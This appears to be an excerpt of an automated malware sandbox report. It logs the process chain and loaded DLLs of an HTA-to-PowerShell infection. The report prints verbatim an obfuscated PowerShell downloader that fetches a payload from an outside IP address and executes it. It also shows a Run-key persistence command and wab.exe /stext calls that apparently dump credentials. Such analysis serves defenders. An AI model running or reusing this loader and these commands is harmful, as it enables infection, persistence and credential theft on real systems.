Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi ';$Robaades='Skjolddragerens';Oraklerne (Bortledede 'D.siS .pveTec.tColl-ElecC UnioBevinM.katL jle P,rnH.sht,rem Van,-RecuPTa taOvertMassh ,el Ro.dTSiou: Bru\TschtDesceProglPrefeE.ptfBarboSemirH,alb odiRenonS,rid erre rovlFremsOmkoe UdbnDgndsSagv.f rstSpirxResutLett I os-nonsV V,sa LoelSisbuFriteGain Exo$UndlRLithoDedibStttaLocoaSol,dResee FowsConv;sogg ');Oraklerne (Bortledede 'PlagiFor,f For D.to( OpvtTaste ChrsGrnstMid.- Forp EftaFas,t,tophArtu KoitTSt g:Ande\ CystS,are atalAflae.dmof,efioLnovrpantbex,si Vi.nLsepdSka eMalul Heas vege FornParas,ore.M.set CarxHiertAncr) P,e{FogeeTranxRaadikerntKirk}Syn,;Kase ');$Baetylic = Bortledede 'Kulte,ondcE,sahA atoTouc Nono% Stea VilpI tepGly d TroaT drtLi.ga Cen%gara\ ,igI FosdHyp.e DasaEighlMandoSvrtgGesjiStu.cCassaAr,plPeal1B ef4Rive3Si.n.Pab.cBaudhKla.oForr Ter& D,n&A.gl konveVrdicBabbhCompoNeoc S ta$ Sem ';Oraklerne (Bortledede '.ype$InfegB,atlFl,ko.ucubFritaEx.alGlo,:s moF ap,rCataoThyrg R kmVuggeAch,nVars=Vare( FrecmatemPistd and Spir/Ant.cDigi Pach$ F,rBProtaShine Cy t DepyCa,rlSelvi FagcSucc)Mora ');Oraklerne (Bortledede 'Pres$LykngBedalTapeoNakebTelpaSvvnlRaci:MorbDSmotiT pmsCplfpW seoUro.n Tope SkanStyrtFlyvetrskn Anch .reeFormdpappeUplenF ld=St,t$.mlgRMenieMi.enAmazp Ar,rgr niAmphsKrydeKug.nT,ng. mpsThrip Undl SeciPondtAf k(Spat$Rre.B KakuReflrKonsg .aleSi.asFa csBerrdSlanos,olmIsol),iat ');$Renprisen=$Disponentenheden[0];Oraklerne (Bortledede 'Ma t$Cherg SpalC.unoN.nebPrecaT.pclstoc:ForfSLevetFortaPrist KriiTitasForetUndei Chik BileXer,rO.ersGadm=NoniN SoreAutow,tan-UmagOMis.bloddj,tole .ufc BiltVill ReidSHotby emos ectunineCocomV.ka.AescNHalveFngstOmph.UnwiWSu,meS.yrbTetrCSlublDrggiJu teS Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Idealogical143.cho && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2496 --field-trial-handle=2420,i,2104451589269232737,4580126100320580491,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nntztmoulottqvhpdqdzbdcbcgr" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qpystfyvzwmgskdtubpbdixslnjqax" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Straddlers" /t REG_EXPAND_SZ /d "%Voiceless% -w 1 $Nedrakning=(Get-ItemProperty -Path 'HKCU:\Underlaying\').Ambisporangiate;%Voiceless% ($Nedrakning)" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll Jump to behavior
